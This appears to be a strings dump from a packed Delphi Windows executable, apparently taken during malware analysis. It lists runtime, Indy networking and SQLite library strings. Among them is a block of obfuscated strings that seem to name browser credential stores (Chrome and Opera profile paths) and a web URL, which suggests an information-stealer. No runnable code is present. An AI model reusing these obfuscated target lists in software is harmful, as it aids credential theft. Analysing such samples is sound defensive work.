,Custom variant type (%s%.4x) is out of range/Custom variant type (%s%.4x) already used by %s*Custom variant type (%s%.4x) is not usable2Too many custom variant types have been registered5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
Operation not supported
External exception %x
External exception %x
Interface not supported
Interface not supported
%s (%s, line %d)
%s (%s, line %d)
Operation aborted(Exception %s in module %s at %p.
Operation aborted(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
No argument for format '%s'"Variant method calls not supported
Invalid variant operation
Invalid variant operation
Invalid NULL variant operation%Invalid variant operation (%s%.8x)
Invalid NULL variant operation%Invalid variant operation (%s%.8x)
Integer overflow Invalid floating point operation
Integer overflow Invalid floating point operation
Invalid pointer operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Invalid class typecast0Access violation at address %p. %s of address %p
!'%s' is not a valid integer value('%s' is not a valid floating point value
!'%s' is not a valid integer value('%s' is not a valid floating point value
'%s' is not a valid date
'%s' is not a valid date
'%s' is not a valid time!'%s' is not a valid date and time '%d.%d' is not a valid timestamp
'%s' is not a valid time!'%s' is not a valid date and time '%d.%d' is not a valid timestamp
'%s' is not a valid GUID value
'%s' is not a valid GUID value
I/O error %d
I/O error %d
%original file name%.exe_1504_rwx_00400000_0026D000:
.idata
.idata
.rdata
.rdata
.reloc
.reloc
.rsrc
.rsrc
.aspack
.aspack
.adata
.adata
kernel32.dll
kernel32.dll
Windows
Windows
MSWHEEL_ROLLMSG
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
otcpa*cze
otcpa*cze
Otcpa
Otcpa
.wnmw
.wnmw
ob`gr[cl.lrol
ob`gr[cl.lrol
wlcpe[cl.lrol
wlcpe[cl.lrol
ijbgx[cl.lrol
ijbgx[cl.lrol
ejb".KhAojrgnp.
ejb".KhAojrgnp.
ejb".sd@ebipeJgticgve6.
ejb".sd@ebipeJgticgve6.
ejb".sd]ragf_tgpaiu
ejb".sd]ragf_tgpaiu
Otcpa ?,84&*Wmhfosu"NP&4.5/"Pvcqtk)0.54,3"Vatqikh-16(35
Otcpa ?,84&*Wmhfosu"NP&4.5/"Pvcqtk)0.54,3"Vatqikh-16(35
ejb".sd]fmjn_kvvikhq
ejb".sd]fmjn_kvvikhq
ejb".sd]fmjn_k`dev`mri
ejb".sd]fmjn_k`dev`mri
ejb".sd]ojvcgajma`
ejb".sd]ojvcgajma`
baakn$(Ccgcrt,
baakn$(Ccgcrt,
ejb".Eeaetr*
ejb".Eeaetr*
ejb".PKFlc(Gxaewta
ejb".PKFlc(Gxaewta
ejb".BipmGtgapc
ejb".BipmGtgapc
Otcpa ?,84&*Wmhfosu"NP&4.5/"Pvcqtk)0.54,3"Vatqikh-16(35$.knwrclhkmnwrgr-
Otcpa ?,84&*Wmhfosu"NP&4.5/"Pvcqtk)0.54,3"Vatqikh-16(35$.knwrclhkmnwrgr-
.VcfivcatPI*
.VcfivcatPI*
.MCFoshnoeb3Pvierauq(
.MCFoshnoeb3Pvierauq(
.hglg9
.hglg9
ejb".BipmGjmsa
ejb".BipmGjmsa
e|egpp&VTfRcsoRjragf.ccvTeuiOflgcp.
e|egpp&VTfRcsoRjragf.ccvTeuiOflgcp.
e|egpp&VTfRcsoRjragf.hicdBtmmQTN(
e|egpp&VTfRcsoRjragf.hicdBtmmQTN(
pvidihcq.mhk
pvidihcq.mhk
%EVRDERC%XIrevg^OtcpaXirevgrra`q.mhk
%EVRDERC%XIrevg^OtcpaXirevgrra`q.mhk
OtcpaSoldkqAleuq
OtcpaSoldkqAleuq
otcpa*cze$)loSol
otcpa*cze$)loSol
weovfmh"otcpa*cze
weovfmh"otcpa*cze
%EVRDERC%XKmzmjnaX@kra`mxX
%EVRDERC%XKmzmjnaX@kra`mxX
\wccrgn/marcderc.numn
\wccrgn/marcderc.numn
8UgavejPhseij&zmhhq=&nvtt
8UgavejPhseij&zmhhq=&nvtt
%QUGRTTMFMJG%XJmcej"Sarvijaq\Evrlmectmil @gvaXAmocjg\Gnpoic^Uwcp @gvaX
%QUGRTTMFMJG%XJmcej"Sarvijaq\Evrlmectmil @gvaXAmocjg\Gnpoic^Uwcp @gvaX
{wccrgnVevkq}#*2,#!.173;945247*2,#!.1(!%,4*2,#!.173;945247*4A55EF-F>26)2365 ;0A4/DBD794710075'(!Y]#/9"
{wccrgnVevkq}#*2,#!.173;945247*2,#!.1(!%,4*2,#!.173;945247*4A55EF-F>26)2365 ;0A4/DBD794710075'(!Y]#/9"
Dmurle
Dmurle
otcpa
otcpa
0|#,2|#,2|#,2|#,2|#,2|#,2|
0|#,2|#,2|#,2|#,2|#,2|#,2|
hprr: )dihc/smrg.vs-gar]ra`grat=perlev;575>
hprr: )dihc/smrg.vs-gar]ra`grat=perlev;575>
%QUGRTTMFMJG%XJmcej"Sarvijaq\Evrlmectmil @gvaXAmocjg\Gnpoic^Uwcp @gvaXBgfesntX
%QUGRTTMFMJG%XJmcej"Sarvijaq\Evrlmectmil @gvaXAmocjg\Gnpoic^Uwcp @gvaXBgfesntX
%EvrDerc%XIrevg"Sk`vwetg\Kvgre&QtedneX
%EvrDerc%XIrevg"Sk`vwetg\Kvgre&QtedneX
dajgta&drkk"marc sngra&ie};Ú`cuhr"Sagpcl&Rrkpkdat"Ka
dajgta&drkk"marc sngra&ie};Ú`cuhr"Sagpcl&Rrkpkdat"Ka
EjsoDmurle
EjsoDmurle
ob`gr[sc.lrol
ob`gr[sc.lrol
wlcpe[sc.lrol
wlcpe[sc.lrol
ijbgx[sc.lrol
ijbgx[sc.lrol
png a~rrauq stktpcl tcpmmuqikh, Png bone$kcy$ncva&rapcltw*"pergnp&cptjkcerkoju. ptcdakcrou. giryvoehpu. kt"opngr$oltajnegrwah&rrkvgrp
png a~rrauq stktpcl tcpmmuqikh, Png bone$kcy$ncva&rapcltw*"pergnp&cptjkcerkoju. ptcdakcrou. giryvoehpu. kt"opngr$oltajnegrwah&rrkvgrp
.mkar|
.mkar|
%QUGRTTMFMJG%XJmcej"Sarvijaq\Evrlmectmil @gvaX_cn`cz\]glda~@rkqqevZWsat"Derc\@cdaqjv\
%QUGRTTMFMJG%XJmcej"Sarvijaq\Evrlmectmil @gvaX_cn`cz\]glda~@rkqqevZWsat"Derc\@cdaqjv\
$&" $&" &ucfaYdovYcupipetjcca$8 bgnsa*
$&" $&" &ucfaYdovYcupipetjcca$8 bgnsa*
oleaut32.dll
oleaut32.dll
EVariantBadIndexError
EVariantBadIndexError
ssShift
ssShift
htKeyword
htKeyword
EInvalidOperation
EInvalidOperation
u%CNu
u%CNu
%s[%d]
%s[%d]
%s_%d
%s_%d
.Owner
.Owner
1.0.4
1.0.4
EIdCanNotBindPortInRange
EIdCanNotBindPortInRange
EIdInvalidPortRange@
EIdInvalidPortRange@
getservbyport
getservbyport
WSAAsyncGetServByPort
WSAAsyncGetServByPort
WSAJoinLeaf
WSAJoinLeaf
WS2_32.DLL
WS2_32.DLL
Wship6.dll
Wship6.dll
EIdIPVersionUnsupportedU
EIdIPVersionUnsupportedU
TIdSocketListWindows
TIdSocketListWindows
TIdStackWindowsU
TIdStackWindowsU
IdStackWindows
IdStackWindows
127.0.0.1
127.0.0.1
ftpTransfer
ftpTransfer
ftpReady
ftpReady
ftpAborted
ftpAborted
EIdTCPConnectionError
EIdTCPConnectionError
EIdObjectTypeNotSupported
EIdObjectTypeNotSupported
Portl
Portl
ClientPortMinl
ClientPortMinl
ClientPortMax
ClientPortMax
PortU
PortU
"EIdTransparentProxyUDPNotSupported
"EIdTransparentProxyUDPNotSupported
TIdTCPClientCustom
TIdTCPClientCustom
IdTCPClient
IdTCPClient
TIdTCPClient
TIdTCPClient
%EIdSocksUDPNotSupportedBySOCKSVersion
%EIdSocksUDPNotSupportedBySOCKSVersion
saUsernamePassword
saUsernamePassword
Passwordl
Passwordl
Port
Port
0.0.0.1
0.0.0.1
0.0.0.0
0.0.0.0
BoundPortl
BoundPortl
DefaultPort
DefaultPort
TIdTCPConnection
TIdTCPConnection
IdTCPConnection
IdTCPConnection
ISO_646.irv:1991
ISO_646.irv:1991
ISO_646.basic:1983
ISO_646.basic:1983
ISO_646.irv:1983
ISO_646.irv:1983
csISO16Portuguese
csISO16Portuguese
csISO84Portuguese2
csISO84Portuguese2
windows-936
windows-936
csShiftJIS
csShiftJIS
ISO-8859-1-Windows-3.0-Latin-1
ISO-8859-1-Windows-3.0-Latin-1
csWindows30Latin1
csWindows30Latin1
ISO-8859-1-Windows-3.1-Latin-1
ISO-8859-1-Windows-3.1-Latin-1
csWindows31Latin1
csWindows31Latin1
ISO-8859-2-Windows-Latin-2
ISO-8859-2-Windows-Latin-2
csWindows31Latin2
csWindows31Latin2
ISO-8859-9-Windows-Latin-5
ISO-8859-9-Windows-Latin-5
csWindows31Latin5
csWindows31Latin5
csMicrosoftPublishing
csMicrosoftPublishing
Windows-31J
Windows-31J
csWindows31J
csWindows31J
windows-1250
windows-1250
windows-1251
windows-1251
windows-1252
windows-1252
windows-1253
windows-1253
windows-1254
windows-1254
windows-1255
windows-1255
windows-1256
windows-1256
windows-1257
windows-1257
windows-1258
windows-1258
Uh%XF
Uh%XF
%s, %.2d %s %.4d %s %s
%s, %.2d %s %.4d %s %s
password
password
Password
Password
CommentURL
CommentURL
IdHTTPHeaderInfo
IdHTTPHeaderInfo
ProxyPasswordl
ProxyPasswordl
ProxyPort
ProxyPort
%d%s%d
%d%s%d
Mozilla/3.0 (compatible; Indy Library)
Mozilla/3.0 (compatible; Indy Library)
TIdHTTPMethod
TIdHTTPMethod
IdHTTP
IdHTTP
TIdHTTPOption
TIdHTTPOption
TIdHTTPOptions
TIdHTTPOptions
TIdHTTPProtocolVersion
TIdHTTPProtocolVersion
IdHTTP8
IdHTTP8
TIdHTTPOnRedirectEvent
TIdHTTPOnRedirectEvent
TIdHTTPResponse
TIdHTTPResponse
TIdHTTPRequest
TIdHTTPRequest
TIdHTTPProtocol
TIdHTTPProtocol
TIdCustomHTTP
TIdCustomHTTP
TIdHTTP
TIdHTTP
HTTPOptions4
HTTPOptions4
EIdHTTPProtocolException
EIdHTTPProtocolException
application/x-www-form-urlencoded
application/x-www-form-urlencoded
HTTPS
HTTPS
https
https
HTTP/1.0 200 OK
HTTP/1.0 200 OK
HTTP/
HTTP/
TSQLTimeStampVariantType
TSQLTimeStampVariantType
TSQLTimeStampData
TSQLTimeStampData
SqlTimSt
SqlTimSt
%s %s
%s %s
(%s%s)
(%s%s)
-%s%s
-%s%s
%s-%s
%s-%s
%s%s-
%s%s-
-%s %s
-%s %s
%s %s-
%s %s-
%s -%s
%s -%s
(%s- %s)
(%s- %s)
(%s %s)
(%s %s)
coInKey
coInKey
IADStanAsyncOperation
IADStanAsyncOperation
IADStanAsyncExecutor
IADStanAsyncExecutor
ole32.dll
ole32.dll
ftParadoxOle
ftParadoxOle
upWhereKeyOnly
upWhereKeyOnly
pfInKey
pfInKey
ImportedConstraint
ImportedConstraint
LookupKeyFields
LookupKeyFields
KeyFields
KeyFields
TSQLTimeStampField
TSQLTimeStampField
SQLTimeStamp
SQLTimeStamp
%s: %s
%s: %s
%s.%s
%s.%s
supports
supports
importNode
importNode
%s="%s"
%s="%s"
%s%s%s: %d%s%s
%s%s%s: %d%s%s
TADSQLTimeIntervalKind
TADSQLTimeIntervalKind
uADStanSQLTimeInt
uADStanSQLTimeInt
TADSQLTimeIntervalData
TADSQLTimeIntervalData
TADSQLTimeIntervalData0gJ
TADSQLTimeIntervalData0gJ
TADSQLTimeIntervalVariantType
TADSQLTimeIntervalVariantType
Cannot perform operation on non initialized interval value
Cannot perform operation on non initialized interval value
%u-%.2u
%u-%.2u
%u %.2u:%.2u:%.2u
%u %.2u:%.2u:%.2u
%u:%.2u:%.2u
%u:%.2u:%.2u
[%s] is not a valid interval
[%s] is not a valid interval
TADGUIxLoginHistoryStorage
TADGUIxLoginHistoryStorage
TADGUIxLoginDialogEvent
TADGUIxLoginDialogEvent
IADGUIxLoginDialog
IADGUIxLoginDialog
gcrSQLWait
gcrSQLWait
IADGUIxAsyncExecuteDialog
IADGUIxAsyncExecuteDialog
%sP%uY
%sP%uY
%sP%uM
%sP%uM
%sP%uD
%sP%uD
%sT%uH
%sT%uH
%sT%uM
%sT%uM
%sT%uS%uF
%sT%uS%uF
%sP%uY%uM
%sP%uY%uM
%sP%uDT%uH
%sP%uDT%uH
%sP%uDT%uH%uM
%sP%uDT%uH%uM
%sP%uDT%uH%uM%uS%uF
%sP%uDT%uH%uM%uS%uF
%sT%uH%uM
%sT%uH%uM
%sT%uH%uM%uS%uF
%sT%uH%uM%uS%uF
%sT%uM%uS%uF
%sT%uM%uS%uF
EADDBArrayExecuteError
EADDBArrayExecuteError
TADThreadMsgBase
TADThreadMsgBase
TADThreadStartMsg
TADThreadStartMsg
TADThreadStopMsg
TADThreadStopMsg
TADThreadTerminateMsg
TADThreadTerminateMsg
Failed to %s thread [%s].
Failed to %s thread [%s].
Timeout [%d] expired
Timeout [%d] expired
System error: %s
System error: %s
%s has not supported architecture [%s]. Required [%s].
%s has not supported architecture [%s]. Required [%s].
delphi32.exe
delphi32.exe
\StringFileInfo\%s\FileDescription
\StringFileInfo\%s\FileDescription
\StringFileInfo\%s\FileVersion
\StringFileInfo\%s\FileVersion
\StringFileInfo\%s\LegalCopyright
\StringFileInfo\%s\LegalCopyright
\StringFileInfo\%s\Comments
\StringFileInfo\%s\Comments
%d.%d.%d (Build %d)%s
%d.%d.%d (Build %d)%s
rvCmdExecMode
rvCmdExecMode
rvCmdExecTimeout
rvCmdExecTimeout
rvDirectExecute
rvDirectExecute
xoIfCmdsInactive
xoIfCmdsInactive
CmdExecMode
CmdExecMode
CmdExecTimeout
CmdExecTimeout
DirectExecute
DirectExecute
rsImportingCurent
rsImportingCurent
rsImportingOriginal
rsImportingOriginal
rsImportingProposed
rsImportingProposed
TADDatSForeignKeyConstraint
TADDatSForeignKeyConstraint
ChildKeyConstraint
ChildKeyConstraint
ParentKeyConstraint
ParentKeyConstraint
yyyy-mm-dd hh:nn:ss.zzz
yyyy-mm-dd hh:nn:ss.zzz
atPLSQLTable
atPLSQLTable
InKey
InKey
skExecute
skExecute
MSSQL
MSSQL
MYSQL
MYSQL
SQLITE
SQLITE
POSTGRESQL
POSTGRESQL
MySQL
MySQL
SQLite
SQLite
TADGUIxAsyncExecuteDialog
TADGUIxAsyncExecuteDialog
TADGUIxLoginDialog
TADGUIxLoginDialog
Object factory for class %s%s is missing
Object factory for class %s%s is missing
Class [%s] does not implement interface [%s]
Class [%s] does not implement interface [%s]
MSSQL2000
MSSQL2000
MSSQL2005
MSSQL2005
%s%s=%s%s%s%s
%s%s=%s%s%s%s
%s%s=%s%s
%s%s=%s%s
Password=*****
Password=*****
NewPassword
NewPassword
NewPassword=*****
NewPassword=*****
ADConnectionDefs.ini
ADConnectionDefs.ini
TADStanAsyncExecutor
TADStanAsyncExecutor
ARow.Table.Name
ARow.Table.Name
HistoryWithPassword(
HistoryWithPassword(
HistoryKey
HistoryKey
LoginRetries
LoginRetries
ChangeExpiredPasswordl
ChangeExpiredPasswordl
OnLogint
OnLogint
OnChangePasswordU
OnChangePasswordU
TADIndexes
TADIndexes
TADSQLTimeIntervalField
TADSQLTimeIntervalField
UpdateOptions.KeyFields
UpdateOptions.KeyFields
UpdateOptions.AutoIncFields
UpdateOptions.AutoIncFields
FSortView.SortingMechanism
FSortView.SortingMechanism
LocateRecord(AKeyFields)
LocateRecord(AKeyFields)
PSGetKeyFields
PSGetKeyFields
(SQLTimeInterval)
(SQLTimeInterval)
Uh.eQ
Uh.eQ
TADConnectionLoginEvent
TADConnectionLoginEvent
TADExecuteErrorEvent
TADExecuteErrorEvent
LoginDialog
LoginDialog
LoginPrompt
LoginPrompt
OnLoginp
OnLoginp
BeforeExecutel
BeforeExecutel
AfterExecutep
AfterExecutep
TADLocalSQLDataSet
TADLocalSQLDataSet
TADLocalSQLDataSets
TADLocalSQLDataSets
TADCustomLocalSQL
TADCustomLocalSQL
Indexes
Indexes
IndexesActive
IndexesActive
BeforeExecuteP
BeforeExecuteP
AfterExecuteP
AfterExecuteP
LocalSQL
LocalSQL
OnExecuteErrorl
OnExecuteErrorl
TADCustomCommand.Prepare
TADCustomCommand.Prepare
TADCustomCommand.Prepare - Exception
TADCustomCommand.Prepare - Exception
TADCustomCommand.Unprepare
TADCustomCommand.Unprepare
TADCustomCommand.Unprepare - Exception
TADCustomCommand.Unprepare - Exception
TADCustomCommand.InternalClose
TADCustomCommand.InternalClose
TADCustomCommand.InternalClose - Exception
TADCustomCommand.InternalClose - Exception
TADCustomCommand.InternalOpenFinished - Exception
TADCustomCommand.InternalOpenFinished - Exception
TADCustomCommand.InternalOpenFinished
TADCustomCommand.InternalOpenFinished
TADCustomCommand.InternalOpen
TADCustomCommand.InternalOpen
TADCustomCommand.InternalOpen - Exception
TADCustomCommand.InternalOpen - Exception
TADCustomCommand.InternalExecuteFinished - Exception
TADCustomCommand.InternalExecuteFinished - Exception
TADCustomCommand.InternalExecuteFinished
TADCustomCommand.InternalExecuteFinished
TADCustomCommand.InternalExecute
TADCustomCommand.InternalExecute
TADCustomCommand.InternalExecute - Exception
TADCustomCommand.InternalExecute - Exception
TADCustomCommand.FetchFinished - Exception
TADCustomCommand.FetchFinished - Exception
TADCustomCommand.FetchFinished
TADCustomCommand.FetchFinished
TADCustomCommand.Fetch
TADCustomCommand.Fetch
TADCustomCommand.Fetch - Exception
TADCustomCommand.Fetch - Exception
TADDefaultLocalSQLAdapter
TADDefaultLocalSQLAdapter
EInvalidGraphicOperation
EInvalidGraphicOperation
USER32.DLL
USER32.DLL
comctl32.dll
comctl32.dll
uxtheme.dll
uxtheme.dll
MAPI32.DLL
MAPI32.DLL
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
JumpID("","%s")
TKeyEvent
TKeyEvent
TKeyPressEvent
TKeyPressEvent
HelpKeyword
HelpKeyword
crSQLWait
crSQLWait
%s (%s)
%s (%s)
imm32.dll
imm32.dll
AutoHotkeys
AutoHotkeys
ssHotTrack
ssHotTrack
TWindowState
TWindowState
poProportional
poProportional
TWMKey
TWMKey
KeyPreview
KeyPreview
WindowState
WindowState
OnKeyDownL
OnKeyDownL
OnKeyPress
OnKeyPress
OnKeyUp$
OnKeyUp$
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
vcltest3.dll
User32.dll
User32.dll
%s$#%d
%s$#%d
uADPhysCmdGenerator
uADPhysCmdGenerator
uADPhysCmdGeneratorU
uADPhysCmdGeneratorU
RDB$DB_KEY AS
RDB$DB_KEY AS
DB_KEY
DB_KEY
{LIMIT(%d,1)}
{LIMIT(%d,1)}
{LIMIT(%d)}
{LIMIT(%d)}
ADDrivers.ini
ADDrivers.ini
Warning: The client [%s] and server [%s] major versions difference > 1.
Warning: The client [%s] and server [%s] major versions difference > 1.
7.0.1 (Build 3119) Professional
7.0.1 (Build 3119) Professional
TADPhysCommandAsyncOperation
TADPhysCommandAsyncOperation
Table Indexes (
Table Indexes (
Table PKeys (
Table PKeys (
Table PKey Fields (
Table PKey Fields (
Table FKeys (
Table FKeys (
Table FKey Fields (
Table FKey Fields (
foreign key name
foreign key name
Primary key
Primary key
TADPhysCommandAsyncExecute
TADPhysCommandAsyncExecute
ABSOLUTE,ACTION,ADA,ADD,ALL,ALLOCATE,ALTER,AND,ANY,ARE,AS,ASC,ASSERTION,AT,AUTHORIZATION,AVG,BEGIN,BETWEEN,BIT,BIT_LENGTH,BOTH,BY,CASCADE,CASCADED,CASE,CAST,CATALOG,CHAR,CHAR_LENGTH,CHARACTER,CHARACTER_LENGTH,CHECK,CLOSE,COALESCE,COLLATE,COLLATION,COLUMN,COMMIT,CONNECT,CONNECTION,CONSTRAINT,CONSTRAINTS,CONTINUE,CONVERT,CORRESPONDING,COUNT,CREATE,CROSS,CURRENT,CURRENT_DATE,CURRENT_TIME,CURRENT_TIMESTAMP,CURRENT_USER,CURSOR,DATE,DAY,DEALLOCATE,DEC,DECIMAL,DECLARE,DEFAULT,DEFERRABLE,DEFERRED,DELETE,DESC,DESCRIBE,DESCRIPTOR,DIAGNOSTICS,DISCONNECT,DISTINCT,DOMAIN,DOUBLE,DROP,ELSE,END,END-EXEC,ESCAPE,EXCEPT,EXCEPTION,EXEC,EXECUTE,EXISTS,EXTERNAL,EXTRACT,FALSE,FETCH,FIRST,FLOAT,FOR,FOREIGN,FORTRAN,FOUND,FROM,FULL,GET,GLOBAL,GO,GOTO,GRANT,GROUP,HAVING,HOUR,IDENTITY,IMMEDIATE,IN,INCLUDE,INDEX,INDICATOR,INITIALLY,INNER,INPUT,INSENSITIVE,INSERT,INT,INTEGER,INTERSECT,INTERVAL,INTO,IS,ISOLATION,JOIN,KEY,LANGUAGE,LAST,LEADING,LEFT,LEVEL,LIKE,LOCAL,LOWER,MATCH,MAX,MIN,MINUTE,MODULE,MONTH,NAMES,NATIONAL,NATURAL,NCHAR,NEXT,NO,NONE,NOT,NULL,NULLIF,NUMERIC,OCTET_LENGTH,OF,ON,ONLY,OPEN,OPTION,OR,ORDER,OUTER,OUTPUT,OVERLAPS,PAD,PARTIAL,PASCAL,PLI,POSITION,PRECISION,PREPARE,PRESERVE,PRIMARY,PRIOR,PRIVILEGES,PROCEDURE,PUBLIC,READ,REAL,REFERENCES,RELATIVE,RESTRICT,REVOKE,RIGHT,ROLLBACK,ROWSSCHEMA,SCROLL,SECOND,SECTION,SELECT,SESSION,SESSION_USER,SET,SIZE,SMALLINT,SOME,SPACE,SQL,SQLCA,SQLCODE,SQLERROR,SQLSTATE,SQLWARNING,SUBSTRING,SUM,SYSTEM_USER,TABLE,TEMPORARY,THEN,TIME,TIMESTAMP,TIMEZONE_HOUR,TIMEZONE_MINUTE,TO,TRAILING,TRANSACTION,TRANSLATE,TRANSLATION,TRIM,TRUE,UNION,UNIQUE,UNKNOWN,UPDATE,UPPER,USAGE,USER,USING,VALUE,VALUES,VARCHAR,VARYING,VIEW,WHEN,WHENEVER,WHERE,WITH,WORK,WRITE,YEAR,ZONE
ABSOLUTE,ACTION,ADA,ADD,ALL,ALLOCATE,ALTER,AND,ANY,ARE,AS,ASC,ASSERTION,AT,AUTHORIZATION,AVG,BEGIN,BETWEEN,BIT,BIT_LENGTH,BOTH,BY,CASCADE,CASCADED,CASE,CAST,CATALOG,CHAR,CHAR_LENGTH,CHARACTER,CHARACTER_LENGTH,CHECK,CLOSE,COALESCE,COLLATE,COLLATION,COLUMN,COMMIT,CONNECT,CONNECTION,CONSTRAINT,CONSTRAINTS,CONTINUE,CONVERT,CORRESPONDING,COUNT,CREATE,CROSS,CURRENT,CURRENT_DATE,CURRENT_TIME,CURRENT_TIMESTAMP,CURRENT_USER,CURSOR,DATE,DAY,DEALLOCATE,DEC,DECIMAL,DECLARE,DEFAULT,DEFERRABLE,DEFERRED,DELETE,DESC,DESCRIBE,DESCRIPTOR,DIAGNOSTICS,DISCONNECT,DISTINCT,DOMAIN,DOUBLE,DROP,ELSE,END,END-EXEC,ESCAPE,EXCEPT,EXCEPTION,EXEC,EXECUTE,EXISTS,EXTERNAL,EXTRACT,FALSE,FETCH,FIRST,FLOAT,FOR,FOREIGN,FORTRAN,FOUND,FROM,FULL,GET,GLOBAL,GO,GOTO,GRANT,GROUP,HAVING,HOUR,IDENTITY,IMMEDIATE,IN,INCLUDE,INDEX,INDICATOR,INITIALLY,INNER,INPUT,INSENSITIVE,INSERT,INT,INTEGER,INTERSECT,INTERVAL,INTO,IS,ISOLATION,JOIN,KEY,LANGUAGE,LAST,LEADING,LEFT,LEVEL,LIKE,LOCAL,LOWER,MATCH,MAX,MIN,MINUTE,MODULE,MONTH,NAMES,NATIONAL,NATURAL,NCHAR,NEXT,NO,NONE,NOT,NULL,NULLIF,NUMERIC,OCTET_LENGTH,OF,ON,ONLY,OPEN,OPTION,OR,ORDER,OUTER,OUTPUT,OVERLAPS,PAD,PARTIAL,PASCAL,PLI,POSITION,PRECISION,PREPARE,PRESERVE,PRIMARY,PRIOR,PRIVILEGES,PROCEDURE,PUBLIC,READ,REAL,REFERENCES,RELATIVE,RESTRICT,REVOKE,RIGHT,ROLLBACK,ROWSSCHEMA,SCROLL,SECOND,SECTION,SELECT,SESSION,SESSION_USER,SET,SIZE,SMALLINT,SOME,SPACE,SQL,SQLCA,SQLCODE,SQLERROR,SQLSTATE,SQLWARNING,SUBSTRING,SUM,SYSTEM_USER,TABLE,TEMPORARY,THEN,TIME,TIMESTAMP,TIMEZONE_HOUR,TIMEZONE_MINUTE,TO,TRAILING,TRANSACTION,TRANSLATE,TRANSLATION,TRIM,TRUE,UNION,UNIQUE,UNKNOWN,UPDATE,UPPER,USAGE,USER,USING,VALUE,VALUES,VARCHAR,VARYING,VIEW,WHEN,WHENEVER,WHERE,WITH,WORK,WRITE,YEAR,ZONE
#INDEXES
#INDEXES
#PRIMARYKEYS
#PRIMARYKEYS
#PRIMARYKEYFIELDS
#PRIMARYKEYFIELDS
#FOREIGNKEYS
#FOREIGNKEYS
#FOREIGNKEYFIELDS
#FOREIGNKEYFIELDS
PKEY_NAME
PKEY_NAME
FKEY_NAME
FKEY_NAME
PKEY_CATALOG_NAME
PKEY_CATALOG_NAME
PKEY_SCHEMA_NAME
PKEY_SCHEMA_NAME
PKEY_TABLE_NAME
PKEY_TABLE_NAME
PKEY_COLUMN_NAME
PKEY_COLUMN_NAME
RESULTSET_KEY
RESULTSET_KEY
RESULTSET_KEY =
RESULTSET_KEY =
TADPhysSQLiteMetadata
TADPhysSQLiteMetadata
TADPhysSQLiteCommandGenerator
TADPhysSQLiteCommandGenerator
ABORT,ADD,AFTER,ALL,ALTER,ANALYZE,AND,AS,ASC,ATTACH,AUTOINCREMENT,BEFORE,BEGIN,BETWEEN,BY,CASCADE,CASE,CAST,CHECK,COLLATE,COLUMN,COMMIT,CONFLICT,CONSTRAINT,CREATE,CROSS,CURRENT_DATE,CURRENT_TIME,CURRENT_TIMESTAMP,DATABASE,DEFAULT,DEFERRABLE,DEFERRED,DELETE,DESC,DETACH,DISTINCT,DROP,EACH,ELSE,END,ESCAPE,EXCEPT,EXCLUSIVE,EXISTS,EXPLAIN,FAIL,FOR,FOREIGN,FROM,FULL,GLOB,GROUP,HAVING,IF,IGNORE,IMMEDIATE,IN,INDEX,INITIALLY,INNER,INSERT,INSTEAD,INTERSECT,INTO,IS,ISNULL,JOIN,KEY,LEFT,LIKE,LIMIT,MATCH,NATURAL,NOT,NOTNULL,NULL,OF,OFFSET,ON,OR,ORDER,OUTER,PLAN,PRAGMA,PRIMARY,QUERY,RAISE,REFERENCES,REGEXP,REINDEX,RENAME,REPLACE,RESTRICT,RIGHT,ROLLBACK,ROW,SELECT,SET,TABLE,TEMP,TEMPORARY,THEN,TO,TRANSACTION,TRIGGER,UNION,UNIQUE,UPDATE,USING,VACUUM,VALUES,VIEW,VIRTUAL,WHEN,WHERE
ABORT,ADD,AFTER,ALL,ALTER,ANALYZE,AND,AS,ASC,ATTACH,AUTOINCREMENT,BEFORE,BEGIN,BETWEEN,BY,CASCADE,CASE,CAST,CHECK,COLLATE,COLUMN,COMMIT,CONFLICT,CONSTRAINT,CREATE,CROSS,CURRENT_DATE,CURRENT_TIME,CURRENT_TIMESTAMP,DATABASE,DEFAULT,DEFERRABLE,DEFERRED,DELETE,DESC,DETACH,DISTINCT,DROP,EACH,ELSE,END,ESCAPE,EXCEPT,EXCLUSIVE,EXISTS,EXPLAIN,FAIL,FOR,FOREIGN,FROM,FULL,GLOB,GROUP,HAVING,IF,IGNORE,IMMEDIATE,IN,INDEX,INITIALLY,INNER,INSERT,INSTEAD,INTERSECT,INTO,IS,ISNULL,JOIN,KEY,LEFT,LIKE,LIMIT,MATCH,NATURAL,NOT,NOTNULL,NULL,OF,OFFSET,ON,OR,ORDER,OUTER,PLAN,PRAGMA,PRIMARY,QUERY,RAISE,REFERENCES,REGEXP,REINDEX,RENAME,REPLACE,RESTRICT,RIGHT,ROLLBACK,ROW,SELECT,SET,TABLE,TEMP,TEMPORARY,THEN,TO,TRANSACTION,TRIGGER,UNION,UNIQUE,UPDATE,USING,VACUUM,VALUES,VIEW,VIRTUAL,WHEN,WHERE
CAST(STRFTIME('%d',
CAST(STRFTIME('%d',
CAST(STRFTIME('%S',
CAST(STRFTIME('%S',
FROM sqlite_sequence WHERE name = '
FROM sqlite_sequence WHERE name = '
sqlite_master t1
sqlite_master t1
sqlite_temp_master t2)
sqlite_temp_master t2)
foreign_key_list("
foreign_key_list("
Password must be not empty
Password must be not empty
Invalid password is specified or DB is corrupted
Invalid password is specified or DB is corrupted
Invalid password is specified
Invalid password is specified
Cipher: Password must be not empty
Cipher: Password must be not empty
Cipher: failed to change the DB password
Cipher: failed to change the DB password
;.ud3
;.ud3
~.SWj
~.SWj
~.CB3
~.CB3
TSQLiteRTreeDoubleArray
TSQLiteRTreeDoubleArray
